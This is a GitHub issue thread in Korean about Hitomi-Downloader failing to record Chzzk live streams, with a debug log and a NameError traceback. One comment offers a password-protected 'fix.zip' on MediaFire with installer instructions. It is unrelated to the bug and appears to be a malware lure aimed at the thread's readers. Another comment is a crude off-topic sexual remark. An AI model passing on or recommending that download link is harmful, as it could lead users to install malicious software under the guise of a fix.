### ISSUE TITLE
치지직 실시간 자동 녹화가 오류 알림이 계속 뜨면서 안되고 있습니다.

### ISSUE THREAD

**Issue by s1Iver** [KurtBestor/Hitomi-Downloader#7447]
어제까지는 정상적으로 녹화가 되었는데,
오늘부터 갑자기 오류 알림이 연속으로 뜨고 있습니다.

Invalid: [chzzk] https://chzzk.naver.com/live/077cdeb373a25c0b5345c31cbf1737d8

version: 4.1 (24-02-28 04:49:54 UTC)
platform / locale: Windows-10-10.0.22631-SP0 / ko_kr
order / group / uid: 0 / False / 2060a0f7c6d5465b9874ba4cedf6384f
input: https://chzzk.naver.com/live/077cdeb373a25c0b5345c31cbf1737d8
type: chzzk
single: True
url: https://chzzk.naver.com/live/077cdeb373a25c0b5345c31cbf1737d8
dir: 
zip: 
artist: None
valid / done: False / True
range / range_p: None / None
time: 1724660619.749935 (24-08-26 08:23:39 UTC) - 8s elapsed
tags: []
lock: False
color: invalid
paused: False
format: None
p2f: None
segment: None
admin: True
goodbyedpi: True
ytdl: yt_dlp 2024.08.06
pinned: False
extras: {}
live: False
changed: True

[File Names]

[URLs]

[Messages]
name 'Video' is not defined
stop
Traceback (most recent call last):
 File "utils", line 1395, in start
 File "utils", line 1474, in start_
 File "C:\Users\jsj35\AppData\Local\Temp\_MEI100602\ytdl_78dcc965\yt_dlp\yt_dlp\chzzk_downloader", line 87, in read
   video = Video({'referer': self.url})
NameError: name 'Video' is not defined

Invalid: fail=True
EOT: https://chzzk.naver.com/live/077cdeb373a25c0b5345c31cbf1737d8  (0.0s)

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HDSRK** [comment]
H컵 눈나는 ㅇㅈ이지

**Comment by Apo-bird** [comment]
동일한 오류를 치지직 아카이브 다운로드와 킥 아카이브, 킥 실시간 녹화에서 겪고 있습니다.
